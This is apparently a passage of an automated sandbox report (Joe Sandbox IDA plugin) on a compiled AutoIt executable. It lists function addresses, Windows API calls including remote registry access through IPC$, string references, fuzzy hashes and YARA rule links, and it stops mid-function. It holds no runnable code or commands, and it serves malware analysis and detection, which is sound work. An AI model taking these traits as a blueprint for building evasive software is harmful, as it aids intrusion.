Instruction ID: 3a96bfa05d70ac0d448354448300b44f57ebebe42a7fb519914baabb83a09890
Opcode Fuzzy Hash: fa1f45a871fde2c366193a2ba591cd779a7d7abb513180d0bc3df0c630a8fc5b
Instruction Fuzzy Hash: 128182B1E042419FCB24EF65C84496BB7E4AF89314F18882FF889D7351E638D949CB57

Function 0048C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
GetFocus.USER32 ref: 0048C20C
GetDlgCtrlID.USER32(00000000), ref: 0048C217
_memset.LIBCMT ref: 0048C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
GetMenuItemCount.USER32(?), ref: 0048C38D
GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489

Strings

0, xrefs: 0048C33A

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: ce5e6c59ea7fb5ab1743ea8bb712758aa64d10e9b8e324f092fc3c417088826e
Instruction ID: c475bcefc4ba02209658d373736a3052ec3262963195f5d7aee57ef1aaf8ece4
Opcode Fuzzy Hash: ce5e6c59ea7fb5ab1743ea8bb712758aa64d10e9b8e324f092fc3c417088826e
Instruction Fuzzy Hash: 17818870608301AFD710EF24D894A7FBBE8EB88714F004D2EF99597291D778D945CBAA

Function 0047731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0047738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
CreateCompatibleDC.GDI32(?), ref: 004773A7
SelectObject.GDI32(00000000,?), ref: 004773B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
SelectObject.GDI32(00000006,?), ref: 00477470
DeleteObject.GDI32(?), ref: 00477479
DeleteDC.GDI32(00000006), ref: 00477480
ReleaseDC.USER32(00000000,?), ref: 0047748B

Strings

(, xrefs: 00477410

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 27e44d1a4b232d095fbb868b1d036b2ec87e1731ca553e17d43f82b721b1af9e
Instruction ID: dfe8a3419fea5eebfe22a8fe4a62b6ec684acb784746aa6277c3acce6f7982dd
Opcode Fuzzy Hash: 27e44d1a4b232d095fbb868b1d036b2ec87e1731ca553e17d43f82b721b1af9e
Instruction Fuzzy Hash: 5D515871904209EFCB14CFA8CC84EAFBBB9EF49310F14852EF959A7211D735A945CB54

Function 00406A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973

Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA

Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5

Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645

Strings

Unterminated string, xrefs: 0043E7E4
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0043E421
Bad directive syntax error, xrefs: 0043E79D
EA06, xrefs: 0043E452
>>>AUTOIT SCRIPT<<<, xrefs: 0043E496
AU3!, xrefs: 00406B61
Error opening the file, xrefs: 0043E43D, 0043E4B8

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: d4bf3eeb06dfc1058760e58eca58f3c86f72bdeb815fc5d753a09aae0dbe2645
Instruction ID: 136c1bde332718f4234bbb9892b60201bfb37e26dd96c6a9a3310cb901d73b7e
Opcode Fuzzy Hash: d4bf3eeb06dfc1058760e58eca58f3c86f72bdeb815fc5d753a09aae0dbe2645
Instruction Fuzzy Hash: 2C027D701083419FC714EF25C8419AFBBE5EF98318F54492FF486A72A2DB38D949CB5A

Function 00462D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
GetMenuItemCount.USER32(004C5890), ref: 00462E66
DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
GetMenuItemCount.USER32(004C5890), ref: 00462F16
SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
GetCursorPos.USER32(?), ref: 00462F56
SetForegroundWindow.USER32(00000000), ref: 00462F5F
TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
Instruction ID: dec7b0e441c84a99d0ab23afc077d39fee676e6f9a2472c44709d087c22ecc3a
Opcode Fuzzy Hash: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
Instruction Fuzzy Hash: AB71F670601A05BBEB219F54DD49FAABF64FF04314F10022BF615AA2E1D7FA5C10DB5A

Function 004788AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004788D7
CoInitialize.OLE32(00000000), ref: 00478904
CoUninitialize.OLE32 ref: 0047890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
SetErrorMode.KERNEL32(00000000), ref: 00478BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
VariantClear.OLEAUT32(?), ref: 00478C35

Strings

,,I, xrefs: 004788C1

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,I
API String ID: 2395222682-4163367948
Opcode ID: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
Instruction ID: aabbb54c80bb5556d5779205c7c98f5c8569651e4766cb9ae3be61758569f7e0
Opcode Fuzzy Hash: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
Instruction Fuzzy Hash: 33C138B1604305AFC700DF25C88896BB7E9FF89348F00896EF9899B251DB75ED05CB56

Function 004577DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

_memset.LIBCMT ref: 0045786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004578A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004578BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004578D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00457902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0045792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00457935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0045793A

Strings

\IPC$, xrefs: 00457882
SOFTWARE\Classes\, xrefs: 0045780C
\CLSID, xrefs: 00457822

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 77803e0cf30d0c6a9af00fa7a29df62c406b8a667e1daf005490fda91c829b3b
Instruction ID: bd842348e8c291230e2108f9814d7b32575dde29d3ae902d03d2cd9f0e66d559
Opcode Fuzzy Hash: 77803e0cf30d0c6a9af00fa7a29df62c406b8a667e1daf005490fda91c829b3b
Instruction Fuzzy Hash: 3F41FB72C14129AADF11EBA5DC85DEEB778FF04314F40447AE905B22A1DB396D08CBA8

Function 00480E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31

Strings

HKEY_USERS, xrefs: 00480F32
HKEY_CLASSES_ROOT, xrefs: 00480EC4
HKEY_CURRENT_CONFIG, xrefs: 00480EEE
HKLM, xrefs: 00480EAF
HKCC, xrefs: 00480EFF
HKCR, xrefs: 00480ED9
HKEY_LOCAL_MACHINE, xrefs: 00480E9A
HKEY_CURRENT_USER, xrefs: 00480F10
HKCU, xrefs: 00480F21
HKU, xrefs: 00480F43

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: a4df75a5d1017b7a8f535d2451c159b81df183318fde1907aaf5dc5abb7e2787
Instruction ID: 987af29362f030b9785e67816bde092fa47ad23058dcaf1b7a905610e89cab94
Opcode Fuzzy Hash: a4df75a5d1017b7a8f535d2451c159b81df183318fde1907aaf5dc5abb7e2787
Instruction Fuzzy Hash: 3C4183312142598BCF60FF11D891AEF3760AF21308F94882BFE5517292D77C9D1ACB69

Function 0045F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0043E2A0,00000010,?,Bad directive syntax error,0048F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0045F7C2
LoadStringW.USER32(00000000,?,0043E2A0,00000010), ref: 0045F7C9

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

_wprintf.LIBCMT ref: 0045F7FC
__swprintf.LIBCMT ref: 0045F81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0045F88D

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 0045F7F7
Line %d (File "%s"):, xrefs: 0045F833
Line %d:, xrefs: 0045F818
., xrefs: 0045F873
Error: , xrefs: 0045F85B

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: b0a5f66eebad9f36124e6602567880734addc3d43cd627ae7dde5d3f4a6a6943
Instruction ID: b323f88afb297f8589dfe01482fd0210897c7bceeb753686804773940a61526b
Opcode Fuzzy Hash: b0a5f66eebad9f36124e6602567880734addc3d43cd627ae7dde5d3f4a6a6943
Instruction Fuzzy Hash: 33215071904219BBCF11EF91CC0AEEE7739BF14309F04087BB515750A2EA39AA18DB59

Function 004652C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

Part of subcall function 00407924: _memmove.LIBCMT ref: 004079AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00465357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00465369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046537A

Strings

alias PlayMe, xrefs: 00465309
status PlayMe mode, xrefs: 0046532B
play PlayMe, xrefs: 00465375
close PlayMe, xrefs: 00465341, 0046536E
open , xrefs: 004652DF
play PlayMe wait, xrefs: 00465364

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
Instruction ID: 2e8e5f898991f968bbba2f693440f846553d5b5edaf37d24830f39f112612e90
Opcode Fuzzy Hash: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
Instruction Fuzzy Hash: CE119370D5015979D720B662CC49EFF7B7CEB91B48F10042F7801A21D1EDB81D45C6BA

Function 004646B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 004646D2
gethostname.WSOCK32(?,00000100), ref: 004646EC
gethostbyname.WSOCK32(?), ref: 004646F9
_wcscpy.LIBCMT ref: 00464721
_memmove.LIBCMT ref: 00464734
inet_ntoa.WSOCK32(?), ref: 0046473F
_strcat.LIBCMT ref: 0046474D
_wcscpy.LIBCMT ref: 00464764
WSACleanup.WSOCK32 ref: 00464772
_wcscpy.LIBCMT ref: 00464780

Strings

0.0.0.0, xrefs: 0046471B

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: cbe6a9854f2a8758ac6b0ec3204168094a3fc6117155a8b4d2da0760867b373f
Instruction ID: ae08325a14d93a890b1fa528d308863361f072a57d3f479d6846efdaae1a579c
Opcode Fuzzy Hash: cbe6a9854f2a8758ac6b0ec3204168094a3fc6117155a8b4d2da0760867b373f
Instruction Fuzzy Hash: BD11F331600114AFDB10AB70AC46EDE77ACEB41716F5405BFF44592191FF7889858B5A

Function 00464F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00464F7A

Part of subcall function 0042049F: timeGetTime.WINMM(?,75A4B400,00410E7B), ref: 004204A3

Sleep.KERNEL32(0000000A), ref: 00464FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
SetActiveWindow.USER32 ref: 0046500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
Sleep.KERNEL32(000000FA), ref: 00465043
IsWindow.USER32 ref: 0046504F
EndDialog.USER32(00000000), ref: 00465060

Strings

BUTTON, xrefs: 00464FDE

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
Instruction ID: 17ca608856519cd1955488b4f204772d3e00e2da9bda675b1abbe090807247ff
Opcode Fuzzy Hash: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
Instruction Fuzzy Hash: A521A174200605BFEB505F60FC88F2A3BA9EB44749F25543EF102922B1EB758D549B6F

Function 0046D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

CoInitialize.OLE32(00000000), ref: 0046D5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0046D67D
SHGetDesktopFolder.SHELL32(?), ref: 0046D691
CoCreateInstance.OLE32(00492D7C,00000000,00000001,004B8C1C,?), ref: 0046D6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0046D74C
CoTaskMemFree.OLE32(?,?), ref: 0046D7A4
_memset.LIBCMT ref: 0046D7E1
SHBrowseForFolderW.SHELL32(?), ref: 0046D81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0046D840
CoTaskMemFree.OLE32(00000000), ref: 0046D847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0046D87E
CoUninitialize.OLE32(00000001,00000000), ref: 0046D880

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: df310d87e4c66fd61e1bd5e69a727a67aed3a0423001bed2a55539e5496fe644
Instruction ID: f865a34610966cb3ccb6f29414af5a3955dc884533e4df89e7e1a7976a3b9bcc
Opcode Fuzzy Hash: df310d87e4c66fd61e1bd5e69a727a67aed3a0423001bed2a55539e5496fe644
Instruction Fuzzy Hash: 39B11B75A00109AFDB04DFA5C888DAEBBB9FF48314F10846AF909EB261DB34ED45CB55

Function 0045C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0045C283
GetWindowRect.USER32(00000000,?), ref: 0045C295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
GetDlgItem.USER32(?,00000002), ref: 0045C2FE
GetWindowRect.USER32(00000000,?), ref: 0045C310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
